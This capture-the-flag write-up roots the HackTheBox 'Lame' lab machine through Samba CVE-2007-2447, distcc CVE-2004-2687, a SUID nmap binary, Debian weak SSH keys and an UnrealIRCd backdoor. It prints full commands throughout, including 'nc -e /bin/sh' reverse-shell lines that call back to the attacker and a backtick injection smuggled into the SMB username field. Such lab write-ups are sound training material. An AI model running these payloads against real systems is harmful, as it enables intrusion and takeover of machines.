Lame is the first machine published on HackTheBox which is vulnerable to SAMBA 3.0.20 (CVE-2007-2447) and Distcc(CVE-2004-2687) exploits. First we will own root using SAMBA exploit manually and later with Metasploit. We’ll also use Distcc exploit which unlike samba exploit gives us user shell and thus further we will use various privilege escalation methods like nmap SUID binary, Weak SSH Key, UnrealIRCd to gain root shell.
Tasks
- Recon using
masscanandnmap - Enumerating individual ports to discover misconfiguration & vulnerabilities
- Analysis
Samba 3.0Metasploit username map script - Exploiting SAMBA manually with crackmapexec to own root
- Exploiting
CVE-2007-2447with usermap script fromamriunix - Using Metasploit to exploit SAMBA
- Exploiting
Distccusing nmap script to get userdaemonshell - PrivEsc1: using
nmapSUID binary to get root - PrivEsc2: Exploiting
CVE-2008-0166to get root user SSH key - PrivEsc3: Creating
UnrealIRCdbackdoor usingconnect-back shellmethod
Reconnaissance
We’ll start with masscan & nmap to discover open ports and services:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
cfx: ~/Documents/htb
→ masscan -e tun0 -p0-65535 --max-rate 500 10.10.10.3
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-09-13 19:52:49 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 21/tcp on 10.10.10.3
Discovered open port 3632/tcp on 10.10.10.3
Discovered open port 22/tcp on 10.10.10.3
Discovered open port 445/tcp on 10.10.10.3
Discovered open port 139/tcp on 10.10.10.3
cfx: ~/Documents/htb
→ nmap -sC -sV -p21,22,139,445,3632 10.10.10.3
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 01:27 IST
Nmap scan report for 10.10.10.3
Host is up (0.25s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.17
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h01m38s, deviation: 2h49m44s, median: 1m36s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2020-09-13T15:59:50-04:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.11 seconds
Based on our scan results we found the following services running on respective ports:
- Port 21:
vsftpd 2.3.4 - Port 22:
OpenSSH 4.7p1 - Port 139,445:
Samba 3.0.20 - Port 3632:
Distccd v1
Lets enumerate these ports further to find out if any of these services are misconfigured or running vulnerable versions.
FTP - Port 21
Anonymous login is allowed on FTP but the directory is empty, so we can move ahead:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
cfx: ~/Documents/htb/lame
→ ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> pwd
257 "/"
ftp> exit
221 Goodbye.
We also saw FTP version running is vsftpd 2.3.4. A quick Google search reveals it’s vulnerable to Backdoor Command Execution.
We can use nmap script to confirm this vulnerability.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
cfx: ~/Documents/htb/lame
→ locate *.nse | grep vsftpd
/usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse
cfx: ~/Documents/htb/lame
→ nmap --script ftp-vsftpd-backdoor.nse -p21 10.10.10.3
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 01:29 IST
Nmap scan report for 10.10.10.3
Host is up (0.30s latency).
PORT STATE SERVICE
21/tcp open ftp
Nmap done: 1 IP address (1 host up) scanned in 23.11 seconds
Based on the script output we can see the host is not vulnerable to vsftpd 2.3.4 backdoor command execution.
SAMBA - Port 139,445
Null Session (Anonymous Login)
Using null session with crackmapexec we discover we have READ,WRITE access to tmp directory
1
2
3
4
5
6
7
8
9
10
11
12
cfx: ~/Documents/htb/lame
→ crackmapexec smb --shares 10.10.10.3 -u '' -p ''
SMB 10.10.10.3 445 LAME [*] Unix (name:LAME) (domain:hackthebox.gr) (signing:False) (SMBv1:True)
SMB 10.10.10.3 445 LAME [+] hackthebox.gr\:
SMB 10.10.10.3 445 LAME [+] Enumerated shares
SMB 10.10.10.3 445 LAME Share Permissions Remark
SMB 10.10.10.3 445 LAME ----- ----------- ------
SMB 10.10.10.3 445 LAME print$ Printer Drivers
SMB 10.10.10.3 445 LAME tmp READ,WRITE oh noes!
SMB 10.10.10.3 445 LAME opt
SMB 10.10.10.3 445 LAME IPC$ IPC Service (lame server (Samba 3.0.20-Debian))
SMB 10.10.10.3 445 LAME ADMIN$ IPC Service (lame server (Samba 3.0.20-Debian))
Let’s enumerate the tmp directory using smbclient. Since this box is running an older version of SMB, on newer client we cannot use smbclient without adding older protocol config to /etc/samba/smb.conf
Credits to 0xdf for providing the protocol info on his Write-up.
1
2
[global]
client min protocol=NT1
We can either add the above config to our /etc/samba/smb.conf or we can use the command line option:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
cfx: ~/Documents/htb/lame
→ smbclient -N //10.10.10.3/tmp --option='client min protocol=NT1'
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> pwd
Current directory is \\10.10.10.3\tmp\
smb: \> dir
. D 0 Mon Sep 14 01:38:09 2020
.. DR 0 Mon May 21 00:06:12 2012
5145.jsvc_up R 0 Sun Sep 13 17:39:08 2020
.ICE-unix DH 0 Sun Sep 13 17:38:05 2020
.X11-unix DH 0 Sun Sep 13 17:38:30 2020
.X0-lock HR 11 Sun Sep 13 17:38:30 2020
7282168 blocks of size 1024. 5678708 blocks available
smb: \> exit
We don’t find anything useful inside the tmp directory.
SAMBA Exploit
Manual Exploitation analysis
Searching for samba 3.0 on searchsploit reveals it has quite some vulnerabilities:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
cfx: ~/Documents/htb/lame
→ searchsploit samba 3.0
---------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------- ---------------------------------
Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow ( | osx/remote/16875.rb
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command | unix/remote/16320.rb
Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Me | linux/remote/9950.rb
Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow | linux/remote/16859.rb
Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overfl | solaris/remote/16329.rb
Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow | linux/dos/4732.c
Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overfl | multiple/dos/5712.pl
Samba 3.0.4 - SWAT Authorisation Buffer Overflow | linux/remote/364.pl
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py
---------------------------------------------------------- ---------------------------------
The one which looks interesting is the Metasploit script Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command | unix/remote/16320.rb which could possibly give us RCE.
Looking at the Metasploit script we discover this is CVE-2007-2447 also known as Samba Usermap script.
1
2
3
4
5
6
7
8
'References' =>
[
[ 'CVE', '2007-2447' ],
[ 'OSVDB', '34700' ],
[ 'BID', '23972' ],
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534' ],
[ 'URL', 'http://samba.org/samba/security/CVE-2007-2447.html' ]
],
Further analysis on Metasploit script indicates the vulnerability is in the Username field which takes the below parameter along with the payload.
1
"/=`nohup " + payload.encoded + "`"
In POSIX or POSIX-like shells (ksh, bash, ash, zsh, yash), The command in the braces of $() or between the backticks (``) is executed in a subshell and the output is then placed in the original command.
Metasploit is using the nohup command short for no hang up which is a command in Linux systems that keep processes running even after exiting the shell or terminal and starting the process outside of current context then a payload.
Root shell
Crackmapexec - Username
Sending the username field data along with reverse shell payload via crackmapexec to get reverse shell as root:
1
2
3
cfx: ~/Documents/htb/lame
→ crackmapexec smb --shares 10.10.10.3 -u './=`nohup nc -e /bin/sh 10.10.14.17 8021`' -p ''
SMB 10.10.10.3 445 LAME [*] Unix (name:LAME) (domain:hackthebox.gr) (signing:False) (SMBv1:True)
Getting a call back on our nc listener
1
2
3
4
5
6
7
8
9
10
11
12
cfx: ~/Documents/htb/lame/CVE-2007-2447 |master ✓|
→ nc -lvnp 8021
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::8021
Ncat: Listening on 0.0.0.0:8021
Ncat: Connection from 10.10.10.3.
Ncat: Connection from 10.10.10.3:53556.
whoami
root
id
uid=0(root) gid=0(root)
exit
We got the shell as root.
Crackmapexec - SMBEXEC
We can also use the smbexec command from crackmapexec to send our payload and execute it:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
cfx: ~/Documents/htb/lame
→ crackmapexec smb -x "./=`nohup nc -e /bin/sh 10.10.14.17 8022`" --exec-method smbexec 10.10.10.3
nohup: ignoring input and redirecting stderr to stdout
SMB 10.10.10.3 445 LAME [*] Unix (name:LAME) (domain:hackthebox.gr) (signing:False) (SMBv1:True)
cfx: ~/Documents/htb/lame
→ nc -lvnp 8022
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::8022
Ncat: Listening on 0.0.0.0:8022
Ncat: Connection from 10.10.14.17.
Ncat: Connection from 10.10.14.17:47782.
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
exit
Usermap python script - amriunix
While searching for CVE-2007-2447 exploits, I came across this python-script from amriunix, Usage and guidelines to install dependencies is available on the repo.
Using usermap script we can instantly get a reverse shell:
1
2
3
4
5
6
7
8
9
10
cfx: ~/Documents/htb/lame/CVE-2007-2447 |master ✓|
→ python3 usermap_script.py
[*] CVE-2007-2447 - Samba usermap script
[-] usage: python usermap_script.py <RHOST> <RPORT> <LHOST> <LPORT>
cfx: ~/Documents/htb/lame/CVE-2007-2447 |master ✓|
→ python3 usermap_script.py 10.10.10.3 139 10.10.14.17 8020
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !
As soon as the script is executed, we get a call back on our nc listener:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
cfx: ~/Documents/htb/lame/
→ nc -lvnp 8020
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 10.10.10.3.
Ncat: Connection from 10.10.10.3:58452.
whoami
root
id
uid=0(root) gid=0(root)
python -c "import pty;pty.spawn('/bin/bash')"
root@lame:/# cd /home
cd /home
root@lame:/home# cd makis
cd makis
root@lame:/home/makis# cat user.txt
cat user.txt
69454a937d94f5f*****************
root@lame:/home/makis# cd /root
cd /root
root@lame:/root# cat root.txt
cat root.txt
92caac3be140ef4*****************
root@lame:/root# exit
Using any of the above methods we get a shell as root from where we can grab our flags.
Metasploit
Since we have already exploited samba 3.0 manually, let’s also exploit it with Metasploit:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
msf5 > search usermap
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
msf5 > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf5 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > set LHOST tun0
LHOST => tun0
msf5 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 10.10.14.17:4444
[*] Command shell session 1 opened (10.10.14.17:4444 -> 10.10.10.3:53196) at 2020-09-14 17:36:33 +0530
whoami
root
id
uid=0(root) gid=0(root)
quit
We get the shell as root with Metasploit as well.
Distcc Exploit
During our enumeration phase we saw Distccd v1 service was running on Port 3632
Distcc is a program designed to distribute compiling tasks across a network to participating hosts. It is comprised of a server, distccd, and a client program, distcc. Distcc can work transparently with ccache, Portage, and Automake with a small amount of setup.
A Quick google search reveals Distccd v1 is vulnerable to command execution and we also an have nmap script to test this vulnerability.
nmap Script
If the script is not available in nmap package by default, you can download it from here and place it in the nmap scripts directory.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
cfx: ~/Documents/htb/lame
→ locate *.nse | grep -i distcc
/usr/share/nmap/scripts/distcc-cve2004-2687.nse
cfx: ~/Documents/htb/lame
→ nmap --script distcc-cve2004-2687.nse -p3632 10.10.10.3
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 01:32 IST
Nmap scan report for 10.10.10.3
Host is up (0.22s latency).
PORT STATE SERVICE
3632/tcp open distccd
| distcc-cve2004-2687:
| VULNERABLE:
| distcc Daemon Command Execution
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2004-2687
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Allows executing of arbitrary commands on systems running distccd 3.1 and
| earlier. The vulnerability is the consequence of weak service configuration.
|
| Disclosure date: 2002-02-01
| Extra information:
|
| uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
| References:
| https://distcc.github.io/security.html
| https://nvd.nist.gov/vuln/detail/CVE-2004-2687
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
Nmap done: 1 IP address (1 host up) scanned in 4.37 seconds
Daemon Shell
Based on the nmap script results we can see the host is vulnerable to CVE-2004-2687 and output of id command inside the script is displays as user daemon.
We can use the argument parameter of the script to change the command from id to reverse shell payload:
1
2
3
4
5
6
7
8
9
10
cfx: ~/Documents/htb/lame
→ nmap -p3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='nc -e /bin/bash 10.10.14.17 4444'"
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 01:42 IST
Nmap scan report for 10.10.10.3
Host is up (0.24s latency).
PORT STATE SERVICE
3632/tcp open distccd
Nmap done: 1 IP address (1 host up) scanned in 31.62 seconds
As soon as the script execution completes, we get a call back on nc listener:
1
2
3
4
5
6
7
8
9
cfx: ~/Documents/htb/lame
→ nc -lvnp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.3.
Ncat: Connection from 10.10.10.3:59434.
whoami
daemon
Since we are running as under privileged user daemon, lets try different privilege escalation methods to gain root.
Root Shell
PrivEsc1 : Nmap SUID
We can use find command to search for SUID binaries on the machine:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
cfx: ~/Documents/htb/lame
→ nc -lvnp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.3.
Ncat: Connection from 10.10.10.3:59434.
whoami
daemon
python -c "import pty;pty.spawn('/bin/bash')"
daemon@lame:/tmp$ find / -type f -perm -u=s 2>/dev/null
find / -type f -perm -u=s 2>/dev/null
/bin/umount
/bin/fusermount
/bin/su
/bin/mount
/bin/ping
/bin/ping6
/sbin/mount.nfs
/lib/dhcp3-client/call-dhclient-script
/usr/bin/sudoedit
/usr/bin/X
/usr/bin/netkit-rsh
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/netkit-rlogin
/usr/bin/arping
/usr/bin/at
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/nmap
/usr/bin/chsh
/usr/bin/netkit-rcp
/usr/bin/passwd
/usr/bin/mtr
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/lib/telnetlogin
/usr/lib/apache2/suexec
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
Out of all the SUID binaries, most intresting is nmap. We can use gtfo guidelines for nmap to escalate privileges and grab our flags.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
daemon@lame:/tmp$ nmap --interactive
nmap --interactive
Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# whoami
whoami
root
sh-3.2# cat /root/root.txt
cat /root/root.txt
92caac3be140ef******************
PrivEsc2 : Weak SSH Key
Credits to 0xdf for pointing out this privilege escalation vector.
We can see user Daemon can read contents of root directory except for root.txt. Inside .ssh directory we are able to read public keys file authorized_keys:
1
2
3
daemon@lame:/root/.ssh$ cat authorized_keys
cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
Looking at the user as msfadmin@metasploitable from authorized_keys it might be possible that this could be vulnerable to CVE-2008-0166 where the random number generator in OpenSSL broke for a period of time causing some SSH keys, to be brute forcible from the public key.
We will use g0tmi1k’s repo to exploit this vulnerability.
1
2
3
4
5
cfx: ~/Documents/htb/lame/debian-ssh/common_keys |master ?:1 ✗|
→ ls
debian_ssh_dsa_1024_x86.tar.bz2 debian_ssh_rsa_2048_x86.tar.bz2
cfx: ~/Documents/htb/lame/debian-ssh/common_keys |master ?:1 ✗|
→ tar jxf debian_ssh_rsa_2048_x86.tar.bz2
After extracting debian_ssh_rsa_2048_x86.tar.bz2, we can use grep and lr for recursive search to just display the filename with the public key.
1
2
3
cfx: ~/Documents/htb/lame/debian-ssh/common_keys/rsa/2048 |master ?:1 ✗|
→ grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== *.pub
57c3115d77c56390332dc5c49978627a-5429.pub
Now we can use the matching private key, but first we need to chmod 600 the key to own it and then SSH to box as root:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
cfx: ~/Documents/htb/lame/debian-ssh/common_keys/rsa/2048 |master ?:1 ✗|
→ ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@10.10.10.3
Last login: Sun Sep 13 11:22:15 2020 from 10.10.14.17
Linux lame 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@lame:~# cat root.txt
92caac3be140ef******************
root@lame:~# exit
logout
PrivEsc3 : UnrealIRCd Backdoored
Looking the listening services on the machine, we can see port 6697 which could be IRC over SSL.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
daemon@lame:/$ netstat -tnlp
netstat -tnlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:512 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:513 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:2049 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:514 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8009 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6697 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:1099 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6667 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5900 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:43181 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:59949 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:39182 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8787 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8180 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:1524 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:41909 0.0.0.0:* LISTEN -
tcp 0 0 10.10.10.3:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5432 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp6 0 0 :::2121 :::* LISTEN -
tcp6 0 0 :::3632 :::* LISTEN -
tcp6 0 0 :::53 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::5432 :::* LISTEN -
tcp6 0 0 ::1:953 :::* LISTEN -
While looking at the processes running on the machine, we can see UnrealIRCd is running as root
1
2
3
4
daemon@lame:/$ ps auxww | grep -i unreal
ps auxww | grep -i unreal
root 5197 0.0 0.4 8540 2368 ? S 08:08 0:01 /usr/bin/unrealircd
daemon 6936 0.0 0.1 1784 540 pts/1 RN+ 16:24 0:00 grep -i unreal
With reference to this article we can exploit this UnrealIRCd to create a backdoor and get a shell as root.
Checking port 6697:
1
2
3
4
daemon@lame:/$ nc 127.0.0.1 6697
nc 127.0.0.1 6697
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
We get output as Metasploitable which indicates we are on right track. In order to easily use the backdoor, we could use the known method of connect-back shell.
Connect-back shell:
1
2
3
4
daemon@lame:/$ echo "AB; nc -e /bin/sh 10.10.14.17 1337" | nc 127.0.0.1 6697
echo "AB; nc -e /bin/sh 10.10.14.17 1337" | nc 127.0.0.1 6697
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
Getting a call back on our nc listener as user root:
1
2
3
4
5
6
7
8
9
10
11
12
cfx: ~/Documents/htb/lame
→ nc -lvnp 1337
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.3.
Ncat: Connection from 10.10.10.3:58268.
whoami
root
id
uid=0(root) gid=0(root)
exit
And we pwned the Box !
Thanks for reading, Feedback is appreciated !